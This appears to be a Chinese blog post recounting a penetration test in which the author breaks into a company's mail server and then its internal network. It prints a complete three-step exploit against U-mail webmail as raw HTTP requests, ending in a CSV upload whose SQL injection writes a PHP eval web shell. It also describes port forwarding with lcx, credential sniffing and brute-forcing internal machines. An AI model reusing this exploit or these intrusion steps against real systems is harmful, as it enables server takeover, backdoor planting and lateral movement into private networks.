记得一次艰难的内网漫游

因为这个站是一次渗透测试项目的站，所以全程打马赛克，请各位见谅。

首先呢我看了下这个站主站没什么漏洞，也可以说我这个菜鸟啥都不会找不到漏洞吧。主站是个精良南方明显打过补丁的啥希望都没了，  我们领导是让我给他搞个能进OA系统的管理员账户，于是我就看了下OA。结果让我感到无奈啊，  这特么的是泛微CMS挺蛋疼的，你说我要是有一枚地下0day该有多好。 

这真的挺蛋疼的百度上找了好多关于泛微CMS的漏洞没一个能用的，最后一点希望也破灭了。 

无奈最后扫了下子域名发现了一个邮箱系统！居然是U-mail的CMS感觉很脆的样子，我就到乌云上面找了几篇关于U-mail的前台GETShell方法。恩就是只要三个步骤的那个。 

具体GETShell操作如下：

第一步，获得物理路径请求

GET /webmail/client/mail/module/test.php HTTP/1.1

Host: **.**.**.**

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: keep-alive

第二步，请求为，响应中获得PHPSESSID

POST /webmail/fast/index.php?module=operate&action=login HTTP/1.1

Host: **.**.**.**

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 30

mailbox=system@**.**.**.**&link=?

第三步，将PHPSESSID和路径写入如下请求，执行getshell EXP即可

POST /webmail/fast/pab/index.php?module=operate&action=contact-import HTTP/1.1

Host: **.**.**.**

Proxy-Connection: keep-alive

Content-Length: 553

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://**.**.**.**

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundary69fA5vmkAMLB8gmA

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4

Cookie: PHPSESSID=53ad27d7a64bd68d372be8a94985606d

------WebKitFormBoundary69fA5vmkAMLB8gmA

Content-Disposition: form-data; name="import_file"; filename="getshell.csv"

Content-Type: application/vnd.ms-excel

Ãû,µç×ÓÓʼþµØÖ·

hello1,hello' AND 1=2 UNION SELECT '<?php eval($_POST[1]);' INTO OUTFILE 'c:\\umail\\WorldClient\\html\\shell.php'#

------WebKitFormBoundary69fA5vmkAMLB8gmA

Content-Disposition: form-data; name="import_group"

10

------WebKitFormBoundary69fA5vmkAMLB8gmA

Content-Disposition: form-data; name="import_mode"

ignore

------WebKitFormBoundary69fA5vmkAMLB8gmA--

        因为我也比较懒就没截这么多张图了具体看不懂的同学可以到某云的bugs/wooyun-2015-093049/这个地址看大牛怎么操作。只知道能GETShell就行了。

原本以为拿到Shell链接数据库就算大工告成了，结果没想到的是他把其他网站放在了内网其他的机器上面，这下就麻烦了难怪我搞了半天没找到OA系统的目录。出于无奈于是我就提权试下，结果还真是尴尬了。3389都开在内网。

出于无奈只好上传个lcx来转发端口，可笑的是我转发一下午没转发出来……后来让我朋友看下，他说我服务器接收不到转发的数据。那就算了换一台服务器搞，结果还真是转发出来了。

        端口转发应该就不用解释了，玩过的同学都应该知道怎么整的。

执行完这两步骤就可以链接127.0.0.1然后我转发的端口是6677我就连接了127.0.0.1:6677。

我的天呐真是久违的一幕，我真是太爱你了。好了话不多说直接上去干。我先是在服务器上面传了个Cain嗅探工具你懂得嘻嘻~不过可悲的是我嗅探了一下午

都没嗅探到东西，后来想想我知道了估计人家下班了我日。无奈我就穿了个Hscan上去爆破但愿有戏吧。

结果真没让我失望！真的爆破到了好多内网机器。

其他的就不多说了上去就是干，一句话不和就是日他。